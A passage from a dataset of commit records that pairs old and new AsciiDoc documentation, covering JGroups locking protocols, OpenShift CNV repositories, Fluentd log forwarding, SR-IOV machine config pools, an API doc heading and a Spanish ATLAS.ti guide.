protocols\n\nThere are currently 2 locking protocols: org.jgroups.protocols.CENTRAL_LOCK and\n org.jgroups.protocols.PEER_LOCK. Both extend Locking, which has the\n following properties:\n \n\n${Locking}\n\n[[CENTRAL_LOCK]]\n\n\n===== CENTRAL_LOCK\n\nCENTRAL_LOCK has the current coordinator of a cluster grant locks, so every node has to communicate\n with the coordinator to acquire or release a lock. Lock requests by different nodes for the same lock\n are processed in the order in which they are received.\n \n\nA coordinator maintains a lock table. To prevent losing the knowledge of who holds which locks, the\n coordinator can push lock information to a number of backups, defined by num_backups. If num_backups\n is 0, no replication of lock information happens. If num_backups is greater than 0, then the coordinator\n pushes information about acquired and released locks to all backup nodes. Topology changes might\n create new backup nodes, and lock information is pushed to those nodes when they become backups.\n \n\nThe advantage of CENTRAL_LOCK is that all lock requests are granted in the same order across\n the cluster, which is not the case with PEER_LOCK.\n \n\n${CENTRAL_LOCK}\n\n[[PEER_LOCK]]\n\n\n===== PEER_LOCK\n\nPEER_LOCK acquires a lock by contacting all cluster nodes, and lock acquisition is only successful\n if all non-faulty cluster nodes (peers) grant it.\n \n\nUnless a total order configuration is used (e.g. org.jgroups.protocols.SEQUENCER based), lock\n requests for the same resource from different senders may be received in a different order, so\n deadlocks can occur.
Example:\n \n* Nodes A and B\n* A and B call lock(X) at the same time\n* A receives L(X,A) followed by L(X,B): locks X(A), queues L(X,B)\n* B receives L(X,B) followed by L(X,A): locks X(B), queues L(X,A)\n \n\nTo acquire a lock, we need lock grants from both A and B, but this will never happen here.\n To fix this, either add SEQUENCER to the configuration, so that all lock requests are received in\n the same global order at both A and B, or use\n java.util.concurrent.locks.Lock.tryLock(long,TimeUnit) with retries if a lock cannot be acquired.\n \n\n${PEER_LOCK}\n\n[[CENTRAL_EXECUTOR]]\n\n\n==== CENTRAL_EXECUTOR\n\nCENTRAL_EXECUTOR is an implementation of Executing which is needed by the ExecutionService.\n \n\n${Executing}\n\n${CENTRAL_EXECUTOR}\n\n[[COUNTER]]\n\n\n==== COUNTER\n\nCOUNTER is the implementation of cluster-wide counters, used by the CounterService.\n \n\n${COUNTER}\n\n[[SUPERVISOR]]\n\n\n==== SUPERVISOR\n\nSUPERVISOR is a protocol which runs rules which periodically (or event-triggered) check conditions and\n take corrective action if a condition is not met. Example: org.jgroups.protocols.rules.CheckFDMonitor is\n a rule which periodically checks if FD's monitor task is running when the cluster size is > 1. If not,\n the monitor task is started.\n \n\nThe SUPERVISOR is explained in more detail in <<Supervisor>>.\n \n\n${SUPERVISOR}\n\n[[FORK]]\n\n\n==== FORK\n\nFORK allows ForkChannels to piggy-back messages on a regular channel. It needs to be placed towards the\n top of the stack. See <<ForkChannel>> for details.\n \n\n${FORK}\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8c5c48649187ff3cc255e67f4585cfbdef37a97e","subject":"Updating CNV repo names for 2.3","message":"Updating CNV repo names for 2.3\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cnv-enabling-cnv-repos.adoc","new_file":"modules\/cnv-enabling-cnv-repos.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ cnv_install\/cnv-installing-virtctl.adoc\n\n[id=\"cnv-enabling-cnv-repos_{context}\"]\n= Enabling container-native virtualization repositories\n\nRed Hat offers {CNVProductName} repositories for both Red Hat Enterprise Linux 8\nand Red Hat Enterprise Linux 7:\n\n* Red Hat Enterprise Linux 8 repository: `cnv-2.3-for-rhel-8-x86_64-rpms`\n\n* Red Hat Enterprise Linux 7 repository: `rhel-7-server-cnv-2.3-rpms`\n\nThe process for enabling the repository in `subscription-manager` is the same\nin both platforms.\n\n.Procedure\n\n* Use `subscription manager` to enable the appropriate {CNVProductName} repository for\n your system:\n+\n----\n# subscription-manager repos --enable <repository>\n----\n\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ cnv_install\/cnv-installing-virtctl.adoc\n\n[id=\"cnv-enabling-cnv-repos_{context}\"]\n= Enabling container-native virtualization repositories\n\nRed Hat offers {CNVProductName} repositories for both Red Hat Enterprise Linux 8\nand Red Hat Enterprise Linux 7:\n\n* Red Hat Enterprise Linux 8 repository: `cnv-2.2-for-rhel-8-x86_64-rpms`\n\n* Red Hat Enterprise Linux 7 repository: `rhel-7-server-cnv-2.2-rpms`\n\nThe process for enabling the repository in `subscription-manager` is the same\nin both platforms.\n\n.Procedure\n\n* Use `subscription manager` to enable the appropriate {CNVProductName} repository for\n your system:\n+\n----\n# 
subscription-manager repos --enable <repository>\n----\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11e6c12ba10d67d7e9c86e87bc5c804105a122d7","subject":"Fix typo in fluentd-server-inecure","message":"Fix typo in fluentd-server-inecure","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cluster-logging-collector-log-forward-fluentd.adoc","new_file":"modules\/cluster-logging-collector-log-forward-fluentd.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-external.adoc\n\n[id=\"cluster-logging-collector-log-forward-fluentd_{context}\"]\n= Forwarding logs using the Fluentd forward protocol\n\nYou can use the Fluentd *forward* protocol to send a copy of your logs to an external log aggregator configured to accept the protocol instead of, or in addition to, the default Elasticsearch log store. You are responsible for configuring the external log aggregator to receive the logs from {product-title}.\n\nTo configure log forwarding using the *forward* protocol, create a `ClusterLogForwarder` Custom Resource (CR) with one or more outputs to the Fluentd servers and pipelines that use those outputs. The Fluentd output can use a TCP (insecure) or TLS (secure TCP) connection.\n\n[NOTE]\n====\nAlternately, you can use a ConfigMap to forward logs using the *forward* protocols. However, this method is deprecated in {product-title} and will be removed in a future release.\n====\n\n.Procedure\n\n. Create a `ClusterLogForwarder` CR YAML file similar to the following:\n+\n[source,yaml]\n----\napiVersion: logging.openshift.io\/v1\nkind: ClusterLogForwarder\nmetadata:\n name: instance <1>\n namespace: openshift-logging <2>\nspec:\n outputs:\n - name: fluentd-server-secure <3>\n type: fluentdForward <4>\n url: 'tls:\/\/fluentdserver.security.example.com:24224' <5>\n secret: <6>\n name: fluentd-secret\n - name: fluentd-server-insecure\n type: fluentdForward\n url: 'tcp:\/\/fluentdserver.home.example.com:24224'\n pipelines:\n - name: forward-to-fluentd-secure <7>\n inputRefs: <8>\n - application\n - audit\n outputRefs:\n - fluentd-server-secure <9>\n - default <10>\n labels:\n clusterId: C1234 <11>\n - name: forward-to-fluentd-insecure <12>\n inputRefs:\n - infrastructure\n outputRefs:\n - fluentd-server-insecure\n labels:\n clusterId: C1234\n----\n<1> The name of the `ClusterLogForwarder` CR must be `instance`.\n<2> The namespace for the log forwarding CR must be `openshift-logging`.\n<3> Specify a name for the output.\n<4> Specify the `fluentdForward` type.\n<5> Specify the URL and port of the external Fluentd instance as a valid absolute URL. You can use the `tcp` (insecure) or `tls` (secure TCP) protocol. If the cluster-wide proxy using the CIDR annotation is enabled, the output must be a server name or FQDN, not an IP address.\n<6> If using a `tls` prefix, you must specify the name of the secret required by the endpoint for TLS communication. The secret must exist in the `openshift-logging` project and must have keys of: *tls.crt*, *tls.key*, and *ca-bundle.crt* that point to the respective certificates that they represent.\n<7> Optional. Specify a name for the pipeline.\n<8> Specify which log types should be forwarded using that pipeline: `application,` `infrastructure`, or `audit`.\n<9> Specify the output to use with that pipeline for forwarding the logs.\n<10> Optional. 
Specify the `default` output to forward logs to the internal Elasticsearch instance.\n<11> Optional. One or more labels to add to the logs.\n<12> Optional: Configure multiple outputs to forward logs to other external log aggregtors of any supported type:\n** Optional. A name to describe the pipeline.\n** The `inputRefs` is the log type to forward using that pipeline: `application,` `infrastructure`, or `audit`.\n** The `outputRefs` is the name of the output to use.\n** Optional: One or more labels to add to the logs.\n\n. Create the CR object:\n+\n[source,terminal]\n----\n$ oc create -f <file-name>.yaml\n----\n\nThe Cluster Logging Operator redeploys the Fluentd pods. If the pods do not redeploy, you can delete the Fluentd\npods to force them to redeploy.\n\n[source,terminal]\n----\n$ oc delete pod --selector logging-infra=fluentd\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * logging\/cluster-logging-external.adoc\n\n[id=\"cluster-logging-collector-log-forward-fluentd_{context}\"]\n= Forwarding logs using the Fluentd forward protocol\n\nYou can use the Fluentd *forward* protocol to send a copy of your logs to an external log aggregator configured to accept the protocol instead of, or in addition to, the default Elasticsearch log store. You are responsible for configuring the external log aggregator to receive the logs from {product-title}.\n\nTo configure log forwarding using the *forward* protocol, create a `ClusterLogForwarder` Custom Resource (CR) with one or more outputs to the Fluentd servers and pipelines that use those outputs. The Fluentd output can use a TCP (insecure) or TLS (secure TCP) connection.\n\n[NOTE]\n====\nAlternately, you can use a ConfigMap to forward logs using the *forward* protocols. However, this method is deprecated in {product-title} and will be removed in a future release.\n====\n\n.Procedure\n\n. Create a `ClusterLogForwarder` CR YAML file similar to the following:\n+\n[source,yaml]\n----\napiVersion: logging.openshift.io\/v1\nkind: ClusterLogForwarder\nmetadata:\n name: instance <1>\n namespace: openshift-logging <2>\nspec:\n outputs:\n - name: fluentd-server-secure <3>\n type: fluentdForward <4>\n url: 'tls:\/\/fluentdserver.security.example.com:24224' <5>\n secret: <6>\n name: fluentd-secret\n - name: fluentd-server-inecure\n type: fluentdForward\n url: 'tcp:\/\/fluentdserver.home.example.com:24224'\n pipelines:\n - name: forward-to-fluentd-secure <7>\n inputRefs: <8>\n - application\n - audit\n outputRefs:\n - fluentd-server-secure <9>\n - default <10>\n labels:\n clusterId: C1234 <11>\n - name: forward-to-fluentd-insecure <12>\n inputRefs:\n - infrastructure\n outputRefs:\n - fluentd-server-insecure\n labels:\n clusterId: C1234\n----\n<1> The name of the `ClusterLogForwarder` CR must be `instance`.\n<2> The namespace for the log forwarding CR must be `openshift-logging`.\n<3> Specify a name for the output.\n<4> Specify the `fluentdForward` type.\n<5> Specify the URL and port of the external Fluentd instance as a valid absolute URL. You can use the `tcp` (insecure) or `tls` (secure TCP) protocol. If the cluster-wide proxy using the CIDR annotation is enabled, the output must be a server name or FQDN, not an IP address.\n<6> If using a `tls` prefix, you must specify the name of the secret required by the endpoint for TLS communication. 
The secret must exist in the `openshift-logging` project and must have keys of: *tls.crt*, *tls.key*, and *ca-bundle.crt* that point to the respective certificates that they represent.\n<7> Optional. Specify a name for the pipeline.\n<8> Specify which log types should be forwarded using that pipeline: `application,` `infrastructure`, or `audit`.\n<9> Specify the output to use with that pipeline for forwarding the logs.\n<10> Optional. Specify the `default` output to forward logs to the internal Elasticsearch instance.\n<11> Optional. One or more labels to add to the logs.\n<12> Optional: Configure multiple outputs to forward logs to other external log aggregtors of any supported type:\n** Optional. A name to describe the pipeline.\n** The `inputRefs` is the log type to forward using that pipeline: `application,` `infrastructure`, or `audit`.\n** The `outputRefs` is the name of the output to use.\n** Optional: One or more labels to add to the logs.\n\n. Create the CR object:\n+\n[source,terminal]\n----\n$ oc create -f <file-name>.yaml\n----\n\nThe Cluster Logging Operator redeploys the Fluentd pods. If the pods do not redeploy, you can delete the Fluentd\npods to force them to redeploy.\n\n[source,terminal]\n----\n$ oc delete pod --selector logging-infra=fluentd\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3eb4421bf88b556223218cf4229f31a96fee435e","subject":"INFUND-7046 Correcting Asciidoc.","message":"INFUND-7046 Correcting Asciidoc.\n\n\nFormer-commit-id: be125c06d4f44698136035be9da53efb388c217d","repos":"InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service,InnovateUKGitHub\/innovation-funding-service","old_file":"ifs-data-service\/src\/docs\/asciidoc\/application-assessment-summary.adoc","new_file":"ifs-data-service\/src\/docs\/asciidoc\/application-assessment-summary.adoc","new_contents":"=== Get ApplicationAssessmentSummary by Application Id\n==== Request\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-request.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/path-parameters.adoc[]\n\n==== Response\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-response.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/response-fields.adoc[]\n\n==== Curl Example\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/curl-request.adoc[]","old_contents":"=== Get created invite by id\n==== Request\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-request.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/path-parameters.adoc[]\n\n==== Response\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/http-response.adoc[]\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/response-fields.adoc[]\n\n==== Curl Example\ninclude::{snippets}\/applicationassessmentsummary\/get-application-assessment-summary\/curl-request.adoc[]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"297247e1cb18b15903796a99588e05740e90f3c9","subject":"Fixing two build errors","message":"Fixing two build 
errors\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/nw-sriov-hwol-configuring-machine-config-pool.adoc","new_file":"modules\/nw-sriov-hwol-configuring-machine-config-pool.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-hardware-offloading.adoc\n\n:_content-type: PROCEDURE\n[id=\"configuring-machine-config-pool_{context}\"]\n= Configuring a machine config pool for hardware offloading\n\nTo enable hardware offloading, you must first create a dedicated machine config pool and configure it to work with the SR-IOV Network Operator.\n\n.Prerequisites\n\n* You installed the OpenShift CLI (`oc`).\n* You have access to the cluster as a user with the `cluster-admin` role.\n\n.Procedure\n\n. Create a machine config pool for machines you want to use hardware offloading on.\n\n.. Create a file, such as `mcp-offloading.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: machineconfiguration.openshift.io\/v1\nkind: MachineConfigPool\nmetadata:\n name: mcp-offloading <1>\nspec:\n machineConfigSelector:\n matchExpressions:\n - {key: machineconfiguration.openshift.io\/role, operator: In, values: [worker,mcp-offloading]} <1>\n nodeSelector:\n matchLabels:\n node-role.kubernetes.io\/mcp-offloading: \"\" <2>\n----\n<1> The name of your machine config pool for hardware offloading.\n<2> This node role label is used to add nodes to the machine config pool.\n\n.. Apply the configuration for the machine config pool:\n+\n[source,terminal]\n----\n$ oc create -f mcp-offloading.yaml\n----\n\n. Add nodes to the machine config pool. Label each node with the node role label of your pool:\n+\n[source,terminal]\n----\n$ oc label node worker-2 node-role.kubernetes.io\/mcp-offloading=\"\"\n----\n\n. Optional: To verify that the new pool is created, run the following command:\n+\n[source,terminal]\n----\n$ oc get nodes\n----\n+\n--\n.Example output\n[source,terminal]\n----\nNAME STATUS ROLES AGE VERSION\nmaster-0 Ready master 2d v1.23.3+d99c04f\nmaster-1 Ready master 2d v1.23.3+d99c04f\nmaster-2 Ready master 2d v1.23.3+d99c04f\nworker-0 Ready worker 2d v1.23.3+d99c04f\nworker-1 Ready worker 2d v1.23.3+d99c04f\nworker-2 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\nworker-3 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\n----\n--\n\n. Add this machine config pool to the `SriovNetworkPoolConfig` custom resource:\n\n.. Create a file, such as `sriov-pool-config.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: sriovnetwork.openshift.io\/v1\nkind: SriovNetworkPoolConfig\nmetadata:\n name: sriovnetworkpoolconfig-offload\n namespace: openshift-sriov-network-operator\nspec:\n ovsHardwareOffloadConfig:\n name: mcp-offloading <1>\n----\n<1> The name of your machine config pool for hardware offloading.\n\n.. 
Apply the configuration:\n+\n[source,terminal]\n----\n$ oc create -f <SriovNetworkPoolConfig_name>.yaml\n----\n+\n[NOTE]\n=====\nWhen you apply the configuration specified in a `SriovNetworkPoolConfig` object, the SR-IOV Operator drains and restarts the nodes in the machine config pool.\n\nIt might take several minutes for a configuration changes to apply.\n=====\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * networking\/configuring-hardware-offloading.adoc\n\n:_content-type: PROCEDURE\n[id=\"configuring-machine-config-pool_{context}\"]\n= Configuring a machine config pool for hardware offloading\n\nTo enable hardware offloading, you must first create a dedicated machine config pool and configure it to work with the SR-IOV Network Operator.\n\n.Prerequisites\n\n* You installed the OpenShift CLI (`oc`).\n* You have access to the cluster as a user with the `cluster-admin` role.\n\n.Procedure\n\n. Create a machine config pool for machines you want to use hardware offloading on.\n\n.. Create a file, such as `mcp-offloading.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: machineconfiguration.openshift.io\/v1\nkind: MachineConfigPool\nmetadata:\n name: mcp-offloading <1>\nspec:\n machineConfigSelector:\n matchExpressions:\n - {key: machineconfiguration.openshift.io\/role, operator: In, values: [worker,mcp-offloading <1>]}\n nodeSelector:\n matchLabels:\n node-role.kubernetes.io\/mcp-offloading <2>: \"\"\n----\n<1> The name of your machine config pool for hardware offloading.\n<2> This node role label is used to add nodes to the machine config pool.\n\n.. Apply the configuration for the machine config pool:\n+\n[source,terminal]\n----\n$ oc create -f mcp-offloading.yaml\n----\n\n. Add nodes to the machine config pool. Label each node with the node role label of your pool:\n+\n[source,terminal]\n----\n$ oc label node worker-2 node-role.kubernetes.io\/mcp-offloading=\"\"\n----\n\n. Optional: To verify that the new pool is created, run the following command:\n+\n[source,terminal]\n----\n$ oc get nodes\n----\n+\n--\n.Example output\n[source,terminal]\n----\nNAME STATUS ROLES AGE VERSION\nmaster-0 Ready master 2d v1.23.3+d99c04f\nmaster-1 Ready master 2d v1.23.3+d99c04f\nmaster-2 Ready master 2d v1.23.3+d99c04f\nworker-0 Ready worker 2d v1.23.3+d99c04f\nworker-1 Ready worker 2d v1.23.3+d99c04f\nworker-2 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\nworker-3 Ready mcp-offloading,worker 47h v1.23.3+d99c04f\n----\n--\n\n. Add this machine config pool to the `SriovNetworkPoolConfig` custom resource:\n\n.. Create a file, such as `sriov-pool-config.yaml`, with content like the following example:\n+\n[source,yaml]\n----\napiVersion: sriovnetwork.openshift.io\/v1\nkind: SriovNetworkPoolConfig\nmetadata:\n name: sriovnetworkpoolconfig-offload\n namespace: openshift-sriov-network-operator\nspec:\n ovsHardwareOffloadConfig:\n name: mcp-offloading <1>\n----\n<1> The name of your machine config pool for hardware offloading.\n\n.. 
Apply the configuration:\n+\n[source,terminal]\n----\n$ oc create -f <SriovNetworkPoolConfig_name>.yaml\n----\n+\n[NOTE]\n=====\nWhen you apply the configuration specified in a `SriovNetworkPoolConfig` object, the SR-IOV Operator drains and restarts the nodes in the machine config pool.\n\nIt might take several minutes for a configuration changes to apply.\n=====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3af37fcc26916a76984ea9b0d089ae1d07ae67ba","subject":"Updates 04-1-tipos-de-documentos-primarios.adoc","message":"Updates 04-1-tipos-de-documentos-primarios.adoc\n\nAuto commit by GitBook Editor","repos":"jmunoz298\/atlasti,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7,jmunoz298\/Atlasti7,jmunoz298\/atlasti,jmunoz298\/atlasti","old_file":"04-1-tipos-de-documentos-primarios.adoc","new_file":"04-1-tipos-de-documentos-primarios.adoc","new_contents":"[[tipos-de-documentos-primarios]]\n=== Tipos de documentos primarios\n\nComo hemos comentado en el cap\u00edtulo Introducci\u00f3n, _Documentos Primarios_ es el t\u00e9rmino que utiliza ATLAS.ti para hacer referencia a nuestras fuentes de datos, las cuales pueden ser de muy diferente tipo, pues podemos trabajar con una gran variedad de formatos: texto, imagen, audio, v\u00eddeo e incluso geo-referencias (Google Earth).\n\n[[texto]]\n==== Texto\n\nProbablemente los documentos de texto ser\u00e1n los que utilizaremos m\u00e1s habitualmente, ya se trate de transcripciones de entrevistas, observaciones, diarios de campo, documentos institucionales, etc. El programa permite la utilizaci\u00f3n de una gran diversidad de formatos de archivo, aunque nosotros nos ocuparemos \u00fanicamente de los m\u00e1s habituales.\n\n[[texto-plano]]\n===== Texto plano\n\nEl formato m\u00e1s b\u00e1sico de texto que podemos utilizar es el texto plano, es decir, archivos con extensi\u00f3n \u201c.txt\u201d que presentan la ventaja de ser el formato m\u00e1s est\u00e1ndar y compatible entre procesadores de texto pero que al mismo tiempo tiene el inconveniente de que no permite ning\u00fan tipo de edici\u00f3n de estilo como negritas, cursivas, etc.\n\n[[texto-enriquecido]]\n===== Texto enriquecido\n\nSe trata en este caso de archivos que permiten, al contrario de los anteriores, formatear el texto de forma que incluya desde negritas y cursivas hasta colores o im\u00e1genes. Aunque como dec\u00edamos, los tipos de\nformatos de archivo (o procesadores de texto) que podemos utilizar son numerosos, tenemos en esta ocasi\u00f3n tres categor\u00edas b\u00e1sicas.\n\nEn primer lugar, podemos utilizar archivos creados con diferentes procesadores de texto (Microsoft Word o Libre Office p.ej.). En este caso los formatos de archivo recomendados son los \u201c.doc\u201d y \u201c.rtf\u201d,\naunque recomendamos la utilizaci\u00f3n de este \u00faltimo puesto que este tipo de documentos (y tambi\u00e9n los .txt) permiten que realicemos cambios sobre los mismos desde el interior del programa (ver <<04-2-asignar-documentos-primarios#edicion-de-documentos, Edici\u00f3n de documentos>>).\n\nTambi\u00e9n podemos utilizar archivos en Portable Document Format (\u201c.pdf\u201d), que aunque estrictamente no se trate de archivos de texto enriquecido, en la pr\u00e1ctica tienen las mismas caracter\u00edsticas, puesto que pueden incluir cualquiera de las caracter\u00edsticas editables permitidas por un procesador de textos. 
Por supuesto se trata de un formato que no ser\u00e1 editable desde ATLAS.ti, pero que tiene la gran ventaja de que la visualizaci\u00f3n del documento ser\u00e1 siempre la misma (algo que puede no ocurrir con otros formatos), lo que resulta fundamental en determinados tipos de an\u00e1lisis.\n\nPor \u00faltimo, dentro de esta categor\u00eda de formatos enriquecidos encontramos los archivos \u201c.htm\u201d, es decir, documentos que hemos podido obtener directamente desde p\u00e1ginas web. La ventaja evidente de este tipo de archivos es que nos permite trabajar de una forma f\u00e1cil con datos extra\u00eddos directamente desde la web, sin necesidad de que tengamos que realizar sobre los mismos ning\u00fan proceso de transformaci\u00f3n o edici\u00f3n. Sin embargo, hay que tener en cuenta que no siempre obtendremos unos resultados id\u00e9nticos a lo que podamos ver en las p\u00e1ginas originales, puesto que no se conservar\u00e1n ni im\u00e1genes ni enlaces ni estilos. Por lo tanto, aunque se trata de una opci\u00f3n interesante consideramos que s\u00f3lo es pr\u00e1ctica para p\u00e1ginas web con formatos simples.\n\n[[multimedia]]\n==== Multimedia\n\nAdem\u00e1s de documentos textuales, podemos incluir como fuentes pr\u00e1cticamente cualquier otro tipo de datos, como im\u00e1genes fijas footnote:[Las im\u00e1genes pueden ser tanto documentos independientes como\nelementos incluidos en los archivos de tipo _.doc_, _.rtf_ y _.pdf_.], audio e incluso v\u00eddeo. Esta variedad de fuentes de datos nos permitir\u00e1 probablemente una mayor flexibilidad y riqueza en nuestro an\u00e1lisis. Una posibilidad que se nos abre con esta diversidad de formatos es la de utilizar la transcripci\u00f3n de una entrevista junto a su registro sonoro o audiovisual, de forma que, en caso de requerirlo, dispondremos de una informaci\u00f3n mucho m\u00e1s rica y precisa a la hora de realizar el an\u00e1lisis\nque si s\u00f3lo disponemos de la transcripci\u00f3n.\n\nUna de las funcionalidades m\u00e1s interesantes del programa es la sincronizaci\u00f3n entre documentos primarios textuales y audiovisuales. ATLAS.ti nos permite, por ejemplo, sincronizar una transcripci\u00f3n con su\ncorrespondiente archivo sonoro de forma que desde un punto concreto de la transcripci\u00f3n, podr\u00edamos acceder inmediatamente al mismo punto o momento en el documento de audio o v\u00eddeo (ver <<04-3-sincronizacion-audio-texto.adoc, Sincronizaci\u00f3n\naudio-texto>>).\n\n[[geo-referencias]]\n==== Geo-referencias\n\nDesde la versi\u00f3n 6 del programa, ATLAS.ti permite, literalmente, incluir \"el mundo\" como documento de datos. 
Aunque esta afirmaci\u00f3n puede parecer exagerada, en la pr\u00e1ctica es factible, puesto que podemos incorporar como documentos primarios mapas de __Google Earth__, en los que podemos, de la misma forma que hacemos con una imagen, seleccionar \"ubicaciones significativas\" para convertirlas en citas.\n","old_contents":"[[tipos-de-documentos-primarios]]\n=== Tipos de documentos primarios\n\nComo hemos comentado en el cap\u00edtulo Introducci\u00f3n, _Documentos Primarios_ es el t\u00e9rmino que utiliza ATLAS.ti para hacer referencia a nuestras fuentes de datos, las cuales pueden ser de muy diferente tipo, pues podemos trabajar con una gran variedad de formatos: texto, imagen, audio, v\u00eddeo e incluso geo-referencias (Google Earth).\n\n[[texto]]\n==== Texto\n\nProbablemente los documentos de texto ser\u00e1n los que utilizaremos m\u00e1s habitualmente, ya se trate de transcripciones de entrevistas, observaciones, diarios de campo, documentos institucionales, etc. El\nprograma permite la utilizaci\u00f3n de una gran diversidad de formatos de archivo, aunque nosotros nos ocuparemos \u00fanicamente de los m\u00e1s habituales.\n\n[[texto-plano]]\n===== Texto plano\n\nEl formato m\u00e1s b\u00e1sico de texto que podemos utilizar es el texto plano, es decir, archivos con extensi\u00f3n \u201c.txt\u201d que presentan la ventaja de ser el formato m\u00e1s est\u00e1ndar y compatible entre procesadores de texto pero que al mismo tiempo tiene el inconveniente de que no permite ning\u00fan tipo de edici\u00f3n de estilo como negritas, cursivas, etc.\n\n[[texto-enriquecido]]\n===== Texto enriquecido\n\nSe trata en este caso de archivos que permiten, al contrario de los anteriores, formatear el texto de forma que incluya desde negritas y cursivas hasta colores o im\u00e1genes. Aunque como dec\u00edamos, los tipos de\nformatos de archivo (o procesadores de texto) que podemos utilizar son numerosos, tenemos en esta ocasi\u00f3n tres categor\u00edas b\u00e1sicas.\n\nEn primer lugar, podemos utilizar archivos creados con diferentes procesadores de texto (Microsoft Word o Libre Office p.ej.). En este caso los formatos de archivo recomendados son los \u201c.doc\u201d y \u201c.rtf\u201d,\naunque recomendamos la utilizaci\u00f3n de este \u00faltimo puesto que este tipo de documentos (y tambi\u00e9n los .txt) permiten que realicemos cambios sobre los mismos desde el interior del programa (ver Edici\u00f3n de documentos en p\u00e1g. 54).\n\nTambi\u00e9n podemos utilizar archivos en Portable Document Format (\u201c.pdf\u201d), que aunque estrictamente no se trate de archivos de texto enriquecido, en la pr\u00e1ctica tienen las mismas caracter\u00edsticas, puesto que pueden incluir cualquiera de las caracter\u00edsticas editables permitidaspor un procesador de textos. Por supuesto se trata de un formato que no ser\u00e1 editable desde ATLAS.ti, pero que tiene la gran ventaja de que la visualizaci\u00f3n del documento ser\u00e1 siempre la misma (algo que puede no ocurrir con otros formatos), lo que resulta fundamental en determinados tipos de an\u00e1lisis.\n\nPor \u00faltimo, dentro de esta categor\u00eda de formatos enriquecidos encontramos los archivos \u201c.htm\u201d, es decir, documentos que hemos podido obtener directamente desde p\u00e1ginas web. 
La ventaja evidente de este tipo\nde archivos es que nos permite trabajar de una forma f\u00e1cil con datos extra\u00eddos directamente desde la web, sin necesidad de que tengamos que realizar sobre los mismos ning\u00fan proceso de transformaci\u00f3n o edici\u00f3n. Sin embargo, hay que tener en cuenta que no siempre obtendremos unos resultados id\u00e9nticos a lo que podamos ver en las p\u00e1ginas originales, puesto que no se conservar\u00e1n ni im\u00e1genes ni enlaces ni estilos CSS. Por lo tanto, aunque se trata de una opci\u00f3n interesante consideramos que s\u00f3lo es pr\u00e1ctica para p\u00e1ginas web con formatos simples.\n\n[[multimedia]]\n==== Multimedia\n\nAdem\u00e1s de documentos textuales, podemos incluir como fuentes pr\u00e1cticamente cualquier otro tipo de datos, como im\u00e1genes fijas footnote:[Las im\u00e1genes pueden ser tanto documentos independientes como\nelementos incluidos en los archivos de tipo __.doc, __.rtf y *.pdf.], audio e incluso v\u00eddeo. Esta variedad de fuentes de datos nos permitir\u00e1 probablemente una mayor flexibilidad y riqueza en nuestro an\u00e1lisis. Una posibilidad que se nos abre con esta diversidad de formatos es la de utilizar la transcripci\u00f3n de una entrevista junto a su registro sonoro o audiovisual, de forma que, en caso de requerirlo, dispondremos de una informaci\u00f3n mucho m\u00e1s rica y precisa a la hora de realizar el an\u00e1lisis\nque si s\u00f3lo disponemos de la transcripci\u00f3n.\n\nUna de las funcionalidades m\u00e1s interesantes del programa es la sincronizaci\u00f3n entre documentos primarios textuales y audiovisuales. ATLAS.ti nos permite, por ejemplo, sincronizar una transcripci\u00f3n con su\ncorrespondiente archivo sonoro de forma que desde un punto concreto de la transcripci\u00f3n, podr\u00edamos acceder inmediatamente al mismo punto o momento en el documento de audio o v\u00eddeo (ver Sincronizaci\u00f3n\naudio-texto, p\u00e1g. 58).\n\n[[geo-referencias]]\n==== Geo-referencias\n\nDesde la versi\u00f3n 6 del programa, ATLAS.ti permite, literalmente, incluir 'el mundo' como documento de datos. Aunque esta afirmaci\u00f3n puede parecer exagerada, en la pr\u00e1ctica es factible, puesto que podemos incorporar como documentos primarios mapas de __Google Earth__, en los que podemos, de la misma forma que hacemos con una imagen, seleccionar 'ubicaciones significativas' para convertirlas en citas.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} 